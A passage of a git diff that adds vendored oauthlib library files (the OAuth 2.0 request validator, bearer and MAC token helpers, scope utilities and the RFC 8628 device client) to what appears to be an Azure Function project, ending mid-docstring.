+            - authorized scopes (request.scopes)
+            - an expiration time
+            - a refresh token, if issued
+            - a claims document, if present in request.claims
+
+        The Bearer token dict may hold a number of items::
+
+            {
+                'token_type': 'Bearer',
+                'access_token': 'askfjh234as9sd8',
+                'expires_in': 3600,
+                'scope': 'string of space separated authorized scopes',
+                'refresh_token': '23sdf876234',  # if issued
+                'state': 'given_by_client',  # if supplied by client (implicit ONLY)
+            }
+
+        Note that while "scope" is a space-separated string of authorized scopes,
+        the original list is still available in request.scopes.
+
+        The token dict is passed as a reference so any changes made to the dictionary
+        will go back to the user. If additional information must be returned to the
+        client user, and it is only possible to get this information after writing
+        the token to storage, it should be added to the token dictionary. If the token
+        dictionary must be modified but the changes should not go back to the user,
+        a copy of the dictionary must be made before making the changes.
+
+        Also note that if an Authorization Code grant request included a valid claims
+        parameter (for OpenID Connect) then the request.claims property will contain
+        the claims dict, which should be saved for later use when generating the
+        id_token and/or UserInfo response content.
+
+        :param token: A Bearer token dict.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+
+        Method is used by all core grant types issuing Bearer tokens:
+            - Authorization Code Grant
+            - Implicit Grant
+            - Resource Owner Password Credentials Grant (might not associate a client)
+            - Client Credentials grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_bearer_token(self, token, scopes, request):
+        """Ensure the Bearer token is valid and authorized access to scopes.
+
+        :param token: A string of random characters.
+        :param scopes: A list of scopes associated with the protected resource.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+
+        A key to OAuth 2 security and restricting impact of leaked tokens is
+        the short expiration time of tokens, *always ensure the token has not
+        expired!*.
+
+        Two different approaches to scope validation:
+
+        1) all(scopes). The token must be authorized access to all scopes
+                        associated with the resource. For example, the
+                        token has access to ``read-only`` and ``images``,
+                        thus the client can view images but not upload new ones.
+                        Allows for fine grained access control through
+                        combining various scopes.
+
+        2) any(scopes). The token must be authorized access to one of the
+                        scopes associated with the resource. For example,
+                        token has access to ``read-only-images``.
+                        Allows for fine grained, although arguably less
+                        convenient, access control.
+
+        A powerful way to use scopes would mimic UNIX ACLs and see a scope
+        as a group with certain privileges. For a restful API these might
+        map to HTTP verbs instead of read, write and execute.
+
+        Note, the request.user attribute can be set to the resource owner
+        associated with this token.
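+
+        A minimal sketch of the all(scopes) approach, assuming a hypothetical
+        in-memory store (``TOKENS`` and its record layout are illustrative,
+        not part of oauthlib)::
+
+            import time
+
+            from oauthlib.oauth2 import RequestValidator
+
+            TOKENS = {}  # access token string -> token record
+
+            class SimpleValidator(RequestValidator):
+
+                def validate_bearer_token(self, token, scopes, request):
+                    record = TOKENS.get(token)
+                    # Always reject unknown or expired tokens.
+                    if record is None or record['expires_at'] < time.time():
+                        return False
+                    # all(scopes): authorized for every required scope.
+                    if not all(s in record['scopes'] for s in scopes):
+                        return False
+                    request.user = record['user']
+                    return True
+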
Similarly, the request.client and
+        request.scopes attributes can be set to the associated client object
+        and authorized scopes. If you then use a decorator such as the
+        one provided for django these attributes will be made available
+        in all protected views as keyword arguments.
+
+        :param token: Unicode Bearer token
+        :param scopes: List of scopes (defined by you)
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is indirectly used by all core Bearer token issuing grant types:
+            - Authorization Code Grant
+            - Implicit Grant
+            - Resource Owner Password Credentials Grant
+            - Client Credentials Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_client_id(self, client_id, request, *args, **kwargs):
+        """Ensure client_id belongs to a valid and active client.
+
+        Note, while not strictly necessary it can often be very convenient
+        to set request.client to the client object associated with the
+        given client_id.
+
+        :param client_id: Unicode client identifier.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - Authorization Code Grant
+            - Implicit Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_code(self, client_id, code, client, request, *args, **kwargs):
+        """Verify that the authorization_code is valid and assigned to the given
+        client.
+
+        Before returning true, set the following based on the information stored
+        with the code in 'save_authorization_code':
+
+            - request.user
+            - request.scopes
+            - request.claims (if given)
+
+        OBS! The request.user attribute should be set to the resource owner
+        associated with this authorization code. Similarly request.scopes
+        must also be set.
+
+        The request.claims property, if it was given, should be assigned a dict.
+
+        If PKCE is enabled (see 'is_pkce_required' and 'save_authorization_code')
+        you MUST set the following based on the information stored:
+            - request.code_challenge
+            - request.code_challenge_method
+
+        :param client_id: Unicode client identifier.
+        :param code: Unicode authorization code.
+        :param client: Client object set by you, see ``.authenticate_client``.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - Authorization Code Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_grant_type(self, client_id, grant_type, client, request, *args, **kwargs):
+        """Ensure client is authorized to use the grant_type requested.
+
+        :param client_id: Unicode client identifier.
+        :param grant_type: Unicode grant type, i.e. authorization_code, password.
+        :param client: Client object set by you, see ``.authenticate_client``.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - Authorization Code Grant
+            - Resource Owner Password Credentials Grant
+            - Client Credentials Grant
+            - Refresh Token Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_redirect_uri(self, client_id, redirect_uri, request, *args, **kwargs):
+        """Ensure client is authorized to redirect to the redirect_uri requested.
+
+        All clients should register the absolute URIs of all URIs they intend
+        to redirect to. The registration is outside of the scope of oauthlib.
+
+        :param client_id: Unicode client identifier.
+        :param redirect_uri: Unicode absolute URI.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - Authorization Code Grant
+            - Implicit Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_refresh_token(self, refresh_token, client, request, *args, **kwargs):
+        """Ensure the refresh token is valid and authorized access to scopes.
+
+        OBS! The request.user attribute should be set to the resource owner
+        associated with this refresh token.
+
+        :param refresh_token: Unicode refresh token.
+        :param client: Client object set by you, see ``.authenticate_client``.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - Authorization Code Grant (indirectly by issuing refresh tokens)
+            - Resource Owner Password Credentials Grant (also indirectly)
+            - Refresh Token Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_response_type(self, client_id, response_type, client, request, *args, **kwargs):
+        """Ensure client is authorized to use the response_type requested.
+
+        :param client_id: Unicode client identifier.
+        :param response_type: Unicode response type, i.e. code, token.
+        :param client: Client object set by you, see ``.authenticate_client``.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - Authorization Code Grant
+            - Implicit Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_scopes(self, client_id, scopes, client, request, *args, **kwargs):
+        """Ensure the client is authorized access to requested scopes.
+
+        :param client_id: Unicode client identifier.
+        :param scopes: List of scopes (defined by you).
+        :param client: Client object set by you, see ``.authenticate_client``.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by all core grant types:
+            - Authorization Code Grant
+            - Implicit Grant
+            - Resource Owner Password Credentials Grant
+            - Client Credentials Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_user(self, username, password, client, request, *args, **kwargs):
+        """Ensure the username and password are valid.
+
+        OBS! The validation should also set the user attribute of the request
+        to a valid resource owner, i.e. request.user = username or similar. If
+        not set you will be unable to associate a token with a user in the
+        persistence method used (commonly, save_bearer_token).
+
+        :param username: Unicode username.
+        :param password: Unicode password.
+        :param client: Client object set by you, see ``.authenticate_client``.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - Resource Owner Password Credentials Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def is_pkce_required(self, client_id, request):
+        """Determine if current request requires PKCE. Default, False.
+        This is called for both "authorization" and "token" requests.
+
+        Override this method to ``return True`` to enable PKCE for everyone.
+        You might want to enable it only for public clients.
+        Note that PKCE can also be used in addition to client authentication.
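+
+        As a sketch of the client-side S256 derivation (RFC 7636, section 4.2:
+        the unpadded base64url encoding of the SHA-256 hash of the
+        code_verifier; variable names illustrative)::
+
+            import base64
+            import hashlib
+            import secrets
+
+            code_verifier = secrets.token_urlsafe(64)  # 43-128 chars required
+            digest = hashlib.sha256(code_verifier.encode('ascii')).digest()
+            code_challenge = base64.urlsafe_b64encode(digest).rstrip(b'=').decode('ascii')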
+ + OAuth 2.0 public clients utilizing the Authorization Code Grant are + susceptible to the authorization code interception attack. This + specification describes the attack as well as a technique to mitigate + against the threat through the use of Proof Key for Code Exchange + (PKCE, pronounced "pixy"). See `RFC7636`_. + + :param client_id: Client identifier. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant + + .. _`RFC7636`: https://tools.ietf.org/html/rfc7636 + """ + return False + + def get_code_challenge(self, code, request): + """Is called for every "token" requests. + + When the server issues the authorization code in the authorization + response, it MUST associate the ``code_challenge`` and + ``code_challenge_method`` values with the authorization code so it can + be verified later. + + Typically, the ``code_challenge`` and ``code_challenge_method`` values + are stored in encrypted form in the ``code`` itself but could + alternatively be stored on the server associated with the code. The + server MUST NOT include the ``code_challenge`` value in client requests + in a form that other entities can extract. + + Return the ``code_challenge`` associated to the code. + If ``None`` is returned, code is considered to not be associated to any + challenges. + + :param code: Authorization code. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: code_challenge string + + Method is used by: + - Authorization Code Grant - when PKCE is active + + """ + return None + + def get_code_challenge_method(self, code, request): + """Is called during the "token" request processing, when a + ``code_verifier`` and a ``code_challenge`` has been provided. + + See ``.get_code_challenge``. + + Must return ``plain`` or ``S256``. You can return a custom value if you have + implemented your own ``AuthorizationCodeGrant`` class. + + :param code: Authorization code. + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: code_challenge_method string + + Method is used by: + - Authorization Code Grant - when PKCE is active + + """ + raise NotImplementedError('Subclasses must implement this method.') + + def is_origin_allowed(self, client_id, origin, request, *args, **kwargs): + """Indicate if the given origin is allowed to access the token endpoint + via Cross-Origin Resource Sharing (CORS). CORS is used by browser-based + clients, such as Single-Page Applications, to perform the Authorization + Code Grant. + + (Note: If performing Authorization Code Grant via a public client such + as a browser, you should use PKCE as well.) + + If this method returns true, the appropriate CORS headers will be added + to the response. By default this method always returns False, meaning + CORS is disabled. + + :param client_id: Unicode client identifier. + :param redirect_uri: Unicode origin. + :param request: OAuthlib request. 
+        :type request: oauthlib.common.Request
+        :rtype: bool
+
+        Method is used by:
+            - Authorization Code Grant
+
+        """
+        return False
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/tokens.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/tokens.py
new file mode 100644
index 0000000..9646b5c
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/tokens.py
@@ -0,0 +1,355 @@
+"""
+oauthlib.oauth2.rfc6749.tokens
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This module contains methods for adding two types of access tokens to requests.
+
+- Bearer https://tools.ietf.org/html/rfc6750
+- MAC https://tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-01
+"""
+import hashlib
+import hmac
+import warnings
+from binascii import b2a_base64
+from urllib.parse import urlparse
+
+from oauthlib import common
+from oauthlib.common import add_params_to_qs, add_params_to_uri
+
+from . import utils
+
+
+class OAuth2Token(dict):
+
+    def __init__(self, params, old_scope=None):
+        super().__init__(params)
+        self._new_scope = None
+        if 'scope' in params and params['scope']:
+            self._new_scope = set(utils.scope_to_list(params['scope']))
+        if old_scope is not None:
+            self._old_scope = set(utils.scope_to_list(old_scope))
+            if self._new_scope is None:
+                # the RFC says that if the scope hasn't changed, it's optional
+                # in params, so set the new scope to the old scope
+                self._new_scope = self._old_scope
+        else:
+            self._old_scope = self._new_scope
+
+    @property
+    def scope_changed(self):
+        return self._new_scope != self._old_scope
+
+    @property
+    def old_scope(self):
+        return utils.list_to_scope(self._old_scope)
+
+    @property
+    def old_scopes(self):
+        return list(self._old_scope)
+
+    @property
+    def scope(self):
+        return utils.list_to_scope(self._new_scope)
+
+    @property
+    def scopes(self):
+        return list(self._new_scope)
+
+    @property
+    def missing_scopes(self):
+        return list(self._old_scope - self._new_scope)
+
+    @property
+    def additional_scopes(self):
+        return list(self._new_scope - self._old_scope)
+
+
+def prepare_mac_header(token, uri, key, http_method,
+                       nonce=None,
+                       headers=None,
+                       body=None,
+                       ext='',
+                       hash_algorithm='hmac-sha-1',
+                       issue_time=None,
+                       draft=0):
+    """Add a `MAC Access Authentication`_ signature to headers.
+
+    Unlike OAuth 1, this HMAC signature does not require inclusion of the
+    request payload/body, nor does it use a combination of client_secret
+    and token_secret; instead it uses a mac_key provided together with the
+    access token.
+
+    Currently two algorithms are supported, "hmac-sha-1" and "hmac-sha-256";
+    `extension algorithms`_ are not supported.
+
+    Example MAC Authorization header, with linebreaks added for clarity:
+
+    Authorization: MAC id="h480djs93hd8",
+                       nonce="1336363200:dj83hs9s",
+                       mac="bhCQXTVyfj5cmA9uKkPFx1zeOXM="
+
+    .. _`MAC Access Authentication`: https://tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-01
+    .. _`extension algorithms`: https://tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-01#section-7.1
+
+    :param token:
+    :param uri: Request URI.
+    :param key: MAC key provided by the token endpoint.
+    :param http_method: HTTP Request method.
+    :param nonce:
+    :param headers: Request headers as a dictionary.
+    :param body:
+    :param ext:
+    :param hash_algorithm: HMAC algorithm provided by the token endpoint.
+    :param issue_time: Time when the MAC credentials were issued (datetime).
+    :param draft: MAC authentication specification version.
+    :return: headers dictionary with the authorization field added.
+    """
+    http_method = http_method.upper()
+    host, port = utils.host_from_uri(uri)
+
+    if hash_algorithm.lower() == 'hmac-sha-1':
+        h = hashlib.sha1
+    elif hash_algorithm.lower() == 'hmac-sha-256':
+        h = hashlib.sha256
+    else:
+        raise ValueError('unknown hash algorithm')
+
+    if draft == 0:
+        nonce = nonce or '{}:{}'.format(utils.generate_age(issue_time),
+                                        common.generate_nonce())
+    else:
+        ts = common.generate_timestamp()
+        nonce = common.generate_nonce()
+
+    sch, net, path, par, query, fra = urlparse(uri)
+
+    if query:
+        request_uri = path + '?' + query
+    else:
+        request_uri = path
+
+    # Hash the body/payload
+    if body is not None and draft == 0:
+        body = body.encode('utf-8')
+        bodyhash = b2a_base64(h(body).digest())[:-1].decode('utf-8')
+    else:
+        bodyhash = ''
+
+    # Create the normalized base string
+    base = []
+    if draft == 0:
+        base.append(nonce)
+    else:
+        base.append(ts)
+        base.append(nonce)
+    base.append(http_method.upper())
+    base.append(request_uri)
+    base.append(host)
+    base.append(port)
+    if draft == 0:
+        base.append(bodyhash)
+    base.append(ext or '')
+    base_string = '\n'.join(base) + '\n'
+
+    # hmac struggles with unicode strings - http://bugs.python.org/issue5285
+    if isinstance(key, str):
+        key = key.encode('utf-8')
+    sign = hmac.new(key, base_string.encode('utf-8'), h)
+    sign = b2a_base64(sign.digest())[:-1].decode('utf-8')
+
+    header = []
+    header.append('MAC id="%s"' % token)
+    if draft != 0:
+        header.append('ts="%s"' % ts)
+    header.append('nonce="%s"' % nonce)
+    if bodyhash:
+        header.append('bodyhash="%s"' % bodyhash)
+    if ext:
+        header.append('ext="%s"' % ext)
+    header.append('mac="%s"' % sign)
+
+    headers = headers or {}
+    headers['Authorization'] = ', '.join(header)
+    return headers
+
+
+def prepare_bearer_uri(token, uri):
+    """Add a `Bearer Token`_ to the request URI.
+    Not recommended, use only if client can't use authorization header or body.
+
+    http://www.example.com/path?access_token=h480djs93hd8
+
+    .. _`Bearer Token`: https://tools.ietf.org/html/rfc6750
+
+    :param token:
+    :param uri:
+    """
+    return add_params_to_uri(uri, [('access_token', token)])
+
+
+def prepare_bearer_headers(token, headers=None):
+    """Add a `Bearer Token`_ to the request headers.
+    Recommended method of passing bearer tokens.
+
+    Authorization: Bearer h480djs93hd8
+
+    .. _`Bearer Token`: https://tools.ietf.org/html/rfc6750
+
+    :param token:
+    :param headers:
+    """
+    headers = headers or {}
+    headers['Authorization'] = 'Bearer %s' % token
+    return headers
+
+
+def prepare_bearer_body(token, body=''):
+    """Add a `Bearer Token`_ to the request body.
+
+    access_token=h480djs93hd8
+
+    .. _`Bearer Token`: https://tools.ietf.org/html/rfc6750
+
+    :param token:
+    :param body:
+    """
+    return add_params_to_qs(body, [('access_token', token)])
+
+
+def random_token_generator(request, refresh_token=False):
+    """
+    :param request: OAuthlib request.
+    :type request: oauthlib.common.Request
+    :param refresh_token:
+    """
+    return common.generate_token()
+
+
+def signed_token_generator(private_pem, **kwargs):
+    """
+    :param private_pem:
+    """
+    def signed_token_generator(request):
+        request.claims = kwargs
+        return common.generate_signed_token(private_pem, request)
+
+    return signed_token_generator
+
+
+def get_token_from_header(request):
+    """
+    Helper function to extract a token from the request header.
+
+    :param request: OAuthlib request.
+    :type request: oauthlib.common.Request
+    :return: The token, or None if the Authorization header is malformed.
+    """
+    token = None
+
+    if 'Authorization' in request.headers:
+        split_header = request.headers.get('Authorization').split()
+        if len(split_header) == 2 and split_header[0].lower() == 'bearer':
+            token = split_header[1]
+    else:
+        token = request.access_token
+
+    return token
+
+
+class TokenBase:
+
+    def __call__(self, request, refresh_token=False):
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def validate_request(self, request):
+        """
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def estimate_type(self, request):
+        """
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+
+class BearerToken(TokenBase):
+    __slots__ = (
+        'request_validator', 'token_generator',
+        'refresh_token_generator', 'expires_in'
+    )
+
+    def __init__(self, request_validator=None, token_generator=None,
+                 expires_in=None, refresh_token_generator=None):
+        self.request_validator = request_validator
+        self.token_generator = token_generator or random_token_generator
+        self.refresh_token_generator = (
+            refresh_token_generator or self.token_generator
+        )
+        self.expires_in = expires_in or 3600
+
+    def create_token(self, request, refresh_token=False, **kwargs):
+        """
+        Create a BearerToken, by default without refresh token.
+
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :param refresh_token:
+        """
+        if "save_token" in kwargs:
+            warnings.warn("`save_token` has been deprecated; it is not called internally. "
+                          "If you need tokens saved, call `request_validator.save_token()` yourself.",
+                          DeprecationWarning)
+
+        if callable(self.expires_in):
+            expires_in = self.expires_in(request)
+        else:
+            expires_in = self.expires_in
+
+        request.expires_in = expires_in
+
+        token = {
+            'access_token': self.token_generator(request),
+            'expires_in': expires_in,
+            'token_type': 'Bearer',
+        }
+
+        # If provided, include the scope. This is optional in some cases
+        # (https://tools.ietf.org/html/rfc6749#section-3.3), but there is
+        # currently no mechanism to coordinate issuing a token for only a
+        # subset of the requested scopes, so all tokens issued are for the
+        # entire set of requested scopes.
+        if request.scopes is not None:
+            token['scope'] = ' '.join(request.scopes)
+
+        if refresh_token:
+            if (request.refresh_token and
+                    not self.request_validator.rotate_refresh_token(request)):
+                token['refresh_token'] = request.refresh_token
+            else:
+                token['refresh_token'] = self.refresh_token_generator(request)
+
+        token.update(request.extra_credentials or {})
+        return OAuth2Token(token)
+
+    def validate_request(self, request):
+        """
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        """
+        token = get_token_from_header(request)
+        return self.request_validator.validate_bearer_token(
+            token, request.scopes, request)
+
+    def estimate_type(self, request):
+        """
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        """
+        if request.headers.get('Authorization', '').split(' ')[0].lower() == 'bearer':
+            return 9
+        elif request.access_token is not None:
+            return 5
+        else:
+            return 0
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/utils.py
new file mode 100644
index 0000000..5c608b8
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/utils.py
@@ -0,0 +1,83 @@
+"""
+oauthlib.oauth2.rfc6749.utils
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This module contains utility methods used by various parts of the OAuth 2 spec.
+"""
+import datetime
+import os
+from urllib.parse import quote, urlparse
+
+from oauthlib.common import urldecode
+
+
+def list_to_scope(scope):
+    """Convert a list of scopes to a space separated string."""
+    if isinstance(scope, str) or scope is None:
+        return scope
+    elif isinstance(scope, (set, tuple, list)):
+        return " ".join([str(s) for s in scope])
+    else:
+        raise ValueError("Invalid scope (%s), must be string, tuple, set, or list." % scope)
+
+
+def scope_to_list(scope):
+    """Convert a space separated string to a list of scopes."""
+    if isinstance(scope, (tuple, list, set)):
+        return [str(s) for s in scope]
+    elif scope is None:
+        return None
+    else:
+        return scope.strip().split(" ")
+
+
+def params_from_uri(uri):
+    params = dict(urldecode(urlparse(uri).query))
+    if 'scope' in params:
+        params['scope'] = scope_to_list(params['scope'])
+    return params
+
+
+def host_from_uri(uri):
+    """Extract hostname and port from URI.
+
+    Will use default port for HTTP and HTTPS if none is present in the URI.
+    """
+    default_ports = {
+        'HTTP': '80',
+        'HTTPS': '443',
+    }
+
+    sch, netloc, path, par, query, fra = urlparse(uri)
+    if ':' in netloc:
+        netloc, port = netloc.split(':', 1)
+    else:
+        port = default_ports.get(sch.upper())
+
+    return netloc, port
+
+
+def escape(u):
+    """Escape a string in an OAuth-compatible fashion.
+
+    TODO: verify whether this can in fact be used for OAuth 2
+
+    """
+    if not isinstance(u, str):
+        raise ValueError('Only unicode objects are escapable.')
+    return quote(u.encode('utf-8'), safe=b'~')
+
+
+def generate_age(issue_time):
+    """Generate an age parameter for MAC authentication draft 00."""
+    td = datetime.datetime.now() - issue_time
+    age = (td.microseconds + (td.seconds + td.days * 24 * 3600)
+           * 10 ** 6) / 10 ** 6
+    return str(age)
+
+
+def is_secure_transport(uri):
+    """Check if the URI is served over SSL (https)."""
+    if os.environ.get('OAUTHLIB_INSECURE_TRANSPORT'):
+        return True
+    return uri.lower().startswith('https://')
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/__init__.py
new file mode 100644
index 0000000..04afdee
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/__init__.py
@@ -0,0 +1,10 @@
+"""
+oauthlib.oauth2.rfc8628
+~~~~~~~~~~~~~~~~~~~~~~~
+
+This module is an implementation of various logic needed
+for consuming and providing OAuth 2.0 Device Authorization RFC8628.
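+
+A rough sketch of the client half of the flow, assuming you transport the
+prepared requests yourself; the endpoint URL and the returned device code
+below are illustrative, not part of this module::
+
+    from oauthlib.oauth2 import DeviceClient
+
+    client = DeviceClient('your_client_id')
+    # 1. POST the prepared URI to the device authorization endpoint.
+    uri = client.prepare_request_uri('https://provider.example/device')
+    # 2. Show the returned user_code/verification_uri to the user, then
+    #    poll the token endpoint with the device_code you received.
+    body = client.prepare_request_body(device_code='returned_device_code')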
+""" +import logging + +log = logging.getLogger(__name__) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..d99a968 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__init__.py new file mode 100644 index 0000000..b779915 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__init__.py @@ -0,0 +1,8 @@ +""" +oauthlib.oauth2.rfc8628 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming OAuth 2.0 Device Authorization RFC8628. +""" +from .device import DeviceClient diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..47f79a7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/device.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/device.cpython-39.pyc new file mode 100644 index 0000000..e777104 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/device.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/device.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/device.py new file mode 100644 index 0000000..1a50922 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc8628/clients/device.py @@ -0,0 +1,94 @@ +""" +oauthlib.oauth2.rfc8628 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 Device Authorization RFC8628. +""" + +from oauthlib.oauth2 import BackendApplicationClient, Client +from oauthlib.oauth2.rfc6749.errors import InsecureTransportError +from oauthlib.oauth2.rfc6749.parameters import prepare_token_request +from oauthlib.oauth2.rfc6749.utils import is_secure_transport, list_to_scope +from oauthlib.common import add_params_to_uri + + +class DeviceClient(Client): + + """A public client utilizing the device authorization workflow. 
+
+    The client can request an access token using a device code and
+    a public client id associated with the device code as defined
+    in RFC8628.
+
+    The device authorization grant type can be used to obtain both
+    access tokens and refresh tokens and is intended to be used in
+    a scenario where the device being authorized does not have a
+    user interface that is suitable for performing authentication.
+    """
+
+    grant_type = 'urn:ietf:params:oauth:grant-type:device_code'
+
+    def __init__(self, client_id, **kwargs):
+        super().__init__(client_id, **kwargs)
+        self.client_secret = kwargs.get('client_secret')
+
+    def prepare_request_uri(self, uri, scope=None, **kwargs):
+        if not is_secure_transport(uri):
+            raise InsecureTransportError()
+
+        scope = self.scope if scope is None else scope
+        params = [('client_id', self.client_id), ('grant_type', self.grant_type)]
+
+        if self.client_secret is not None:
+            params.append(('client_secret', self.client_secret))
+
+        if scope:
+            params.append(('scope', list_to_scope(scope)))
+
+        for k in kwargs:
+            if kwargs[k]:
+                params.append((str(k), kwargs[k]))
+
+        return add_params_to_uri(uri, params)
+
+    def prepare_request_body(self, device_code, body='', scope=None,
+                             include_client_id=False, **kwargs):
+        """Add device_code to the request body.
+
+        The client makes a request to the token endpoint by adding the
+        device_code as a parameter using the
+        "application/x-www-form-urlencoded" format to the HTTP request
+        body.
+
+        :param body: Existing request body (URL encoded string) to embed parameters
+                     into. This may contain extra parameters. Default ''.
+        :param scope: The scope of the access request as described by
+                      `Section 3.3`_.
+
+        :param include_client_id: `True` to send the `client_id` in the
+                                  body of the upstream request. This is required
+                                  if the client is not authenticating with the
+                                  authorization server as described in
+                                  `Section 3.2.1`_. False otherwise (default).
+        :type include_client_id: Boolean
+
+        :param kwargs: Extra credentials to include in the token request.
+
+        The prepared body will include the provided ``device_code`` as well
+        as the ``grant_type`` parameter set to
+        ``urn:ietf:params:oauth:grant-type:device_code``::
+
+            >>> from oauthlib.oauth2 import DeviceClient
+            >>> client = DeviceClient('your_id')
+            >>> client.prepare_request_body(device_code='your_code', scope=['hello', 'world'])
+            'grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Adevice_code&device_code=your_code&scope=hello+world'
+
+        .. _`Section 3.3`: https://datatracker.ietf.org/doc/html/rfc6749#section-3.3
+        .. _`Section 3.2.1`: https://datatracker.ietf.org/doc/html/rfc6749#section-3.2.1
+        .. 
